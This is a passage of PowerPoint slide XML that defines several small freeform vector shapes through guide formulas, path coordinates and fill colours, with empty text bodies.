              <a:gd name="T20" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T40" fmla="*/ 0 w 79"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T42" fmla="*/ 0 w 79"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T44" fmla="*/ 0 w 79"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T66" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T68" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T70" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T71" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T72" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T73" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T74" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T75" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T76" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T77" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T78" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T79" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T80" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T81" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T82" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T83" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T84" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T85" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T86" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T87" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T88" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T89" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T90" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T91" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T92" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T93" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T94" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T95" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T96" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T97" fmla="*/ 2147483647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9"/>
              <a:gd name="T148" fmla="*/ 0 h 91"/>
              <a:gd name="T149" fmla="*/ 79 w 79"/>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9" h="91">
                <a:moveTo>
                  <a:pt x="78" y="3"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="78" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="50" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="50" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71" y="90"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79" y="91"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="82"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77" y="70"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="57"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="3"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="333333"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10375" name="Freeform 456"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1568450" y="6256338"/>
            <a:ext cx="298450" cy="203200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T2" fmla="*/ 0 w 132"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T51" fmla="*/ 0 h 90"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T53" fmla="*/ 0 h 90"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T66" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T68" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T70" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T71" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T72" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T73" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T74" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T75" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T76" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T77" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T78" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T79" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T80" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T81" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T82" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T83" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T84" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T85" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T86" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T87" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T88" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T89" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T90" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T91" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T92" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T93" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T94" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T95" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T96" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T97" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T98" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T99" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T100" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T101" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T102" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T103" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T104" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T105" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T106" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T107" fmla="*/ 2147483647 h 9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2"/>
              <a:gd name="T163" fmla="*/ 0 h 90"/>
              <a:gd name="T164" fmla="*/ 132 w 132"/>
              <a:gd name="T165" fmla="*/ 90 h 9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2" h="90">
                <a:moveTo>
                  <a:pt x="1" y="67"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="78"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="86" y="90"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91" y="87"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="94" y="85"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103" y="79"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107" y="74"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="112" y="71"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="117" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="121" y="59"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="125" y="53"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="131" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="127" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="117" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="117" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118" y="18"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="117" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114" y="51"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108" y="64"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107" y="64"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="105" y="66"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103" y="67"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="70"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96" y="70"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92" y="71"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69" y="71"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="67"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="99D8D8"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10376" name="Freeform 457"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1531937" y="6454775"/>
            <a:ext cx="217488" cy="69850"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 96"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 31"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 96"/>
              <a:gd name="T3" fmla="*/ 0 h 31"/>
              <a:gd name="T4" fmla="*/ 0 w 96"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 31"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 96"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 31"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 96"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 31"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 96"/>
              <a:gd name="T16" fmla="*/ 0 h 31"/>
              <a:gd name="T17" fmla="*/ 96 w 96"/>
              <a:gd name="T18" fmla="*/ 31 h 31"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="96" h="31">
                <a:moveTo>
                  <a:pt x="96" y="11"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="93" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96" y="11"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10377" name="Freeform 458"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1638300" y="6477000"/>
            <a:ext cx="95250" cy="31750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 42"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 42"/>
              <a:gd name="T3" fmla="*/ 0 h 14"/>
              <a:gd name="T4" fmla="*/ 0 w 42"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 42"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 42"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 42"/>
              <a:gd name="T16" fmla="*/ 0 h 14"/>
              <a:gd name="T17" fmla="*/ 42 w 42"/>
              <a:gd name="T18" fmla="*/ 14 h 14"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="42" h="14">
                <a:moveTo>
                  <a:pt x="42" y="6"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42" y="6"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="99D8D8"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10378" name="Freeform 459"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1543050" y="6461125"/>
            <a:ext cx="63500" cy="22225"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 28"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T2" fmla="*/ 0 w 28"/>
              <a:gd name="T3" fmla="*/ 0 h 10"/>
              <a:gd name="T4" fmla="*/ 0 w 28"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 28"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 28"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 28"/>
              <a:gd name="T16" fmla="*/ 0 h 10"/>
              <a:gd name="T17" fmla="*/ 28 w 28"/>
              <a:gd name="T18" fmla="*/ 10 h 10"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="28" h="10">
                <a:moveTo>
                  <a:pt x="28" y="4"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="4"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="99D8D8"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
